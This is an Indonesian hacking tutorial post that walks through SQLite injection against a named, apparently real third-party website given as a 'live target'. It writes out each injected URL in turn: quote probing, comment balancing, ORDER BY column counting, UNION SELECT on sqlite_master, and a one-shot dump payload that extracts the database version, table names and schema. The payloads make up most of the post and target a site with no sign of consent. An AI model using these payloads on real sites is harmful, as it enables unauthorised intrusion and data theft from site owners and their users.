Assalamualaikum warahmatullahi wabarakatuh alhamdulillahirobbilalamin, puji syukur kepada Tuhan Yang mana Pada hari ini saya masih diberikan nikmat kesehatan nikmat Iman bahkan ruang dan waktu agar sekiranya bisa memberikan materi pada hari ini.
Baiklah saya ingin memberikan materi atau artikel tentang bagaimana cara melakukan SQLite injection.
Tak lupa juga sering saya ingatkan untuk jangan melewatkan artikel-artikel sebelumnya apalagi yang terutama kalian harus melihat artikel Bagaimana cara melakukan SQL injection dan poin-poin pentingnya, dan itu ada di artikel sebelumnya.
Sebelum itu saya ingin menyediakan live targetnya di bawah ini.
live target :: https://www.andremartinezreed.com/curated-shows-details.php?id=55
langsung aja perhatikan cara mengerjakannnya, perhatikan gambar dibawah ini.
sepertu biasa kita lihat indexnya, gambar dibawah ini adalah index awalnya
https://www.andremartinezreed.com/curated-shows-details.php?id=55
seperti biasa kita berikan "single-quote"
dan perhatikan gambar dibawah ini dengan teliti, adalah sesuatu yang terlihat error atau tidak seperti index seelumnya.
https://www.andremartinezreed.com/curated-shows-details.php?id=55'
dan indexnya rusak atau error, langsung saja kita berikan "URL Balancer" untuk menormalkan website yang telah diberikan "Single-Quote"
perhatikan gambar dibawah ini
https://www.andremartinezreed.com/curated-shows-details.php?id=55'--+-
yups normal seperti biasa, langsung saja kita berikan ORDER BY untuk prnghitungan angka kolom dan perhatikan perbedaannya dibawah ini.
https://www.andremartinezreed.com/curated-shows-details.php?id=55'ORDER BY 6--+-
errornya berada di angka 6 dan
https://www.andremartinezreed.com/curated-shows-details.php?id=55'ORDER BY 5--+-
dan di angka 5 terdapat kolom yang normal
baiklah langsung saja kita eksekusi dengan menggunakan UNION SELECT "ini sama seperti cara kita mengerjakan ORACLE hanya saja perbedaannya tak.menggunakan NULL dan From dual"
perhatikan saja caranya dan perhatikan gambar dibawah ini.
https://www.andremartinezreed.com/curated-shows-details.php?id=55'AND 0 UNION SELECT 1,2,3,4,5 from SQLite_master--+-
yups sama seperti oracle hanya saja berbeda tekniknya....
dan untuk comandnya juga berbeda, untuk version sendiri cara ngeceknya adalah
cek version :: SQLite_version()
table_name :: tbl_name
column_name :: sql
comand sql ini ibaratkan column name jadi langsung saja kita eksekusi dengan membuat diosnya, perhatikan gambar dibawah ini dengan seksama.
https://www.andremartinezreed.com/curated-shows-details.php?id=55'AND 0 UNION SELECT 1,2,'<i><b><li>numb_X12',4,5 from SQLite_master--+-
disini kita buat nama terlebih dahulu, agar mudah dipahami saya jelaskan secara detail dan singkat.
perhatikan lagi gambar dibawah ini setalah kita memaksukan nama, langsung saja kita masukkan command pertama yaitu versionnya.
https://www.andremartinezreed.com/curated-shows-details.php?id=55'AND 0 UNION SELECT 1,2,'<i><b><li>numb_X12'||'<i><b><li>'||SQLite_version(),4,5 from SQLite_master--+-
sedikit penjelasan, disini saya sedikit memperindah diosnya dengan tag html seperti
<i> = tulisan miring
<b> = mempertebal tulisan
<li> = untuk menampilkan item pada unordered dan ordered pada list
<br> = untuk membuat paragraf
dan mari kita lanjutkan dengan penjelasan kedua yaitu kenapa dios di atas menggunakan ||
penjelasanya sangat mudah, itu hanya sebuah penghubung pada dios.
oke next perhatikan command kedua yaitu tbl_name, jangan lupa menggunakan group concat yaa.
https://www.andremartinezreed.com/curated-shows-details.php?id=55'AND 0 UNION SELECT 1,2,'<i><b><li>numb_X12'||'<i><b><li>'||SQLite_version()||'<i><b><br><br>'||group_concat('<li>'||tbl_name),4,5 from SQLite_master--+-
nah kalian pahami saja konsep dan algoritma dari dios ini, karena mudah dipahami untuk dios SQLite ini.
next selanjutnya command ke 3 yaitu "sql"
perhatikan gambar dibawah ini dengan seksama
https://www.andremartinezreed.com/curated-shows-details.php?id=55'AND 0 UNION SELECT 1,2,'<i><b><li>numb_X12'||'<i><b><li>'||SQLite_version()||'<i><b><br><br>'||group_concat('<li>'||tbl_name||' >> '||sql),4,5 from SQLite_master--+-
dan boom, kenapa kedump sedikit? ya karena tergantung website ya.
segitu aja dulu dari saya
saya numb_X12 mengucapkan terimakasih
semoga dengan apa yang saya sampaikan menjadi ilmu yang bermanfaat dan tak disalah gunakan....
semoga kita dipertemukan di next materi InnSyaaAllah...
dan saya mengucapkan banyak banyak terimakasih pada clan X12
ASSALAMU'ALAYKUM WARAHMATULLAHI WABARAKAATUH.
:)